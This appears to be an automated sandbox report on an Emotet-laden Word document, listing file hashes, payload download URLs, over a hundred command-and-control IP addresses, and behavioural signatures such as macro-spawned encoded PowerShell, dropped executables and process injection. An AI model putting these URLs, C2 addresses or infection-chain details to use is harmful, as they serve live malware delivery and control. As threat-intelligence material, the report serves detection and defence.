Analysis
max time kernel: 137s
max time network: 131s
platform: windows10_x64
resource: win10
submitted: 23-09-2020 17:01

Static task: static1
Behavioral task: behavioral1
Sample: emotet_e1_7933d8d9847728baa3c56f3d63a5539deb3a9260f1d7e03df15affdaed3a57b9_2020-09-23__170016437769._doc.doc
Resource: win7
General
Target: emotet_e1_7933d8d9847728baa3c56f3d63a5539deb3a9260f1d7e03df15affdaed3a57b9_2020-09-23__170016437769._doc.doc
Size: 160KB
MD5: 0ed5a42c5691a1ab4c27bf8c2aed5210
SHA1: 2d43412fc8c55c9a2d7a2c2d3f18c6adc96f867d
SHA256: 7933d8d9847728baa3c56f3d63a5539deb3a9260f1d7e03df15affdaed3a57b9
SHA512: 16034e9b9931d93b0f245f86fa4efb5aeabd86d9840087a86d1b691262703d6cd2b945fafe1a8044a87e5c7adf14eab0a1a01d4eb0fbbed6a840885276ebfe76
Malware Config
Extracted (URLs):
http://khobormalda.com/wp-content/82/
http://blog.zunapro.com/wp-admin/LEE/
http://megasolucoesti.com/R9KDq0O8w/Y/
https://online24h.biz/wp-admin/K/
https://fepami.com/wp-includes/eaI/
http://ora-ks.com/system/cache/w/
http://padamagro.com/wp-admin/Nc/
Extracted (emotet C2 addresses):
12.163.208.58:80
45.33.35.74:8080
87.106.253.248:8080
192.241.146.84:8080
190.115.18.139:8080
65.36.62.20:80
170.81.48.2:80
83.169.21.32:7080
185.232.182.218:80
190.2.31.172:80
77.106.157.34:8080
82.230.1.24:80
202.4.58.197:80
201.213.177.139:80
78.249.119.122:80
123.51.47.18:80
77.90.136.129:8080
60.93.23.51:80
152.169.22.67:80
190.117.79.209:80
60.108.144.104:443
213.197.182.158:8080
82.76.111.249:443
209.236.123.42:8080
190.24.243.186:80
177.74.228.34:80
191.182.6.118:80
96.245.123.149:80
61.197.92.216:80
1.226.84.243:8080
111.67.12.221:8080
216.47.196.104:80
185.94.252.27:443
70.116.143.84:80
187.162.248.237:80
217.13.106.14:8080
80.11.164.185:80
35.143.99.174:80
190.190.148.27:8080
219.92.13.25:80
70.32.115.157:8080
96.227.52.8:443
51.75.33.127:80
95.9.180.128:80
174.113.69.136:80
119.106.216.84:80
111.67.77.202:8080
91.105.94.200:80
178.250.54.208:8080
98.13.75.196:80
2.36.95.106:80
186.70.127.199:8090
116.202.23.3:8080
202.134.4.210:7080
50.28.51.143:8080
45.33.77.42:8080
67.247.242.247:80
137.74.106.111:7080
85.214.26.7:8080
181.30.61.163:443
77.238.212.227:80
185.215.227.107:443
186.103.141.250:443
50.121.220.50:80
74.136.144.133:80
104.131.41.185:8080
61.92.159.208:8080
104.131.103.37:8080
51.15.7.189:80
185.94.252.12:80
94.176.234.118:443
212.71.237.140:8080
5.196.35.138:7080
45.46.37.97:80
70.32.84.74:8080
199.203.62.165:80
38.88.126.202:8080
51.159.23.217:443
155.186.0.121:80
51.38.124.206:80
181.129.96.162:8080
64.201.88.132:80
92.24.50.153:80
189.2.177.210:443
45.16.226.117:443
76.168.54.203:80
185.178.10.77:80
220.109.145.69:80
192.81.38.31:80
68.183.170.114:8080
177.73.0.98:443
138.97.60.141:7080
192.241.143.52:8080
217.199.160.224:7080
185.183.16.47:80
177.129.17.170:443
5.189.178.202:8080
74.58.215.226:80
51.255.165.160:8080
12.162.84.2:8080
149.202.72.142:7080
87.106.46.107:8080
188.135.15.49:80
68.183.190.199:8080
172.104.169.32:8080
68.69.155.181:80
72.47.248.48:7080
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | pid_target | process | target process
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1848 | 3604 | POWeRsHeLL.exe |

Emotet Payload (8 IoCs)
Detects Emotet payload in memory.
Processes:
  resource | yara_rule
  behavioral2/memory/400-15-0x00000000004B0000-0x00000000004C2000-memory.dmp | emotet
  behavioral2/memory/400-15-0x00000000004B0000-0x00000000004C2000-memory.dmp | emotet
  behavioral2/memory/400-16-0x00000000004D0000-0x00000000004E0000-memory.dmp | emotet
  behavioral2/memory/400-16-0x00000000004D0000-0x00000000004E0000-memory.dmp | emotet
  behavioral2/memory/1464-19-0x0000000000430000-0x0000000000442000-memory.dmp | emotet
  behavioral2/memory/1464-19-0x0000000000430000-0x0000000000442000-memory.dmp | emotet
  behavioral2/memory/1464-20-0x00000000001F0000-0x0000000000200000-memory.dmp | emotet
  behavioral2/memory/1464-20-0x00000000001F0000-0x0000000000200000-memory.dmp | emotet

Blacklisted process makes network request (4 IoCs)
Processes:
  flow | pid | process
  14 | 1848 | POWeRsHeLL.exe
  16 | 1848 | POWeRsHeLL.exe
  18 | 1848 | POWeRsHeLL.exe
  35 | 1848 | POWeRsHeLL.exe

Executes dropped EXE (2 IoCs)
Processes:
  pid | process
  400 | X9ouqft.exe
  1464 | Microsoft.Uev.Office2010CustomActions.exe

Drops file in System32 directory (1 IoC)
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\SysWOW64\KBDSL\Microsoft.Uev.Office2010CustomActions.exe | X9ouqft.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes:
  pid | process
  2896 | WINWORD.EXE
  2896 | WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (7 IoCs)
Processes:
  pid | process
  1848 | POWeRsHeLL.exe
  1848 | POWeRsHeLL.exe
  1848 | POWeRsHeLL.exe
  1464 | Microsoft.Uev.Office2010CustomActions.exe
  1464 | Microsoft.Uev.Office2010CustomActions.exe
  1464 | Microsoft.Uev.Office2010CustomActions.exe
  1464 | Microsoft.Uev.Office2010CustomActions.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 1848 | POWeRsHeLL.exe

Suspicious use of SetWindowsHookEx (9 IoCs)
Processes:
  pid | process
  2896 | WINWORD.EXE (9 occurrences)

Suspicious use of WriteProcessMemory (6 IoCs)
Processes:
  description | pid | process | target process
  PID 1848 wrote to memory of 400 | 1848 | POWeRsHeLL.exe | X9ouqft.exe
  PID 1848 wrote to memory of 400 | 1848 | POWeRsHeLL.exe | X9ouqft.exe
  PID 1848 wrote to memory of 400 | 1848 | POWeRsHeLL.exe | X9ouqft.exe
  PID 400 wrote to memory of 1464 | 400 | X9ouqft.exe | Microsoft.Uev.Office2010CustomActions.exe
  PID 400 wrote to memory of 1464 | 400 | X9ouqft.exe | Microsoft.Uev.Office2010CustomActions.exe
  PID 400 wrote to memory of 1464 | 400 | X9ouqft.exe | Microsoft.Uev.Office2010CustomActions.exe
Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_7933d8d9847728baa3c56f3d63a5539deb3a9260f1d7e03df15affdaed3a57b9_2020-09-23__170016437769._doc.doc" /o ""
  signatures: Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: AddClipboardFormatListener; Suspicious use of SetWindowsHookEx

C:\Windows\System32\WindowsPowerShell\v1.0\POWeRsHeLL.exe
  command line: POWeRsHeLL -ENCOD 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
  signatures: Process spawned unexpected child process; Blacklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

C:\Users\Admin\Hyu9hv3\Mfnxo3w\X9ouqft.exe
  command line: "C:\Users\Admin\Hyu9hv3\Mfnxo3w\X9ouqft.exe"
  signatures: Executes dropped EXE; Drops file in System32 directory; Suspicious use of WriteProcessMemory

C:\Windows\SysWOW64\KBDSL\Microsoft.Uev.Office2010CustomActions.exe
  command line: "C:\Windows\SysWOW64\KBDSL\Microsoft.Uev.Office2010CustomActions.exe"
  signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
Downloads
C:\Users\Admin\Hyu9hV3\MfNXO3w\X9ouqft.exe
C:\Users\Admin\Hyu9hv3\Mfnxo3w\X9ouqft.exe
C:\Windows\SysWOW64\KBDSL\Microsoft.Uev.Office2010CustomActions.exe
memory/400-12-0x0000000000000000-mapping.dmp
memory/400-16-0x00000000004D0000-0x00000000004E0000-memory.dmp (Filesize: 64KB)
memory/400-15-0x00000000004B0000-0x00000000004C2000-memory.dmp (Filesize: 72KB)
memory/1464-20-0x00000000001F0000-0x0000000000200000-memory.dmp (Filesize: 64KB)
memory/1464-19-0x0000000000430000-0x0000000000442000-memory.dmp (Filesize: 72KB)
memory/1464-17-0x0000000000000000-mapping.dmp
memory/1848-10-0x0000017F4D3C0000-0x0000017F4D3C1000-memory.dmp (Filesize: 4KB)
memory/1848-11-0x0000017F4D770000-0x0000017F4D771000-memory.dmp (Filesize: 4KB)
memory/1848-9-0x00007FFBEBB10000-0x00007FFBEC4FC000-memory.dmp (Filesize: 9MB)
memory/2896-0-0x00007FFBF2F20000-0x00007FFBF35E6000-memory.dmp (Filesize: 6MB)
memory/2896-8-0x000002298FFF8000-0x000002298FFFD000-memory.dmp (Filesize: 20KB)
memory/2896-7-0x000002298FFFD000-0x0000022990002000-memory.dmp (Filesize: 20KB)
memory/2896-6-0x000002298D7AE000-0x000002298D7B5000-memory.dmp (Filesize: 28KB)
memory/2896-5-0x000002298FE76000-0x000002298FE7B000-memory.dmp (Filesize: 20KB)
memory/2896-4-0x000002298FE7B000-0x000002298FE80000-memory.dmp (Filesize: 20KB)
memory/2896-3-0x000002298FE7B000-0x000002298FE80000-memory.dmp (Filesize: 20KB)
memory/2896-2-0x000002298FE7B000-0x000002298FE80000-memory.dmp (Filesize: 20KB)
memory/2896-1-0x000002298FE76000-0x000002298FE7B000-memory.dmp (Filesize: 20KB)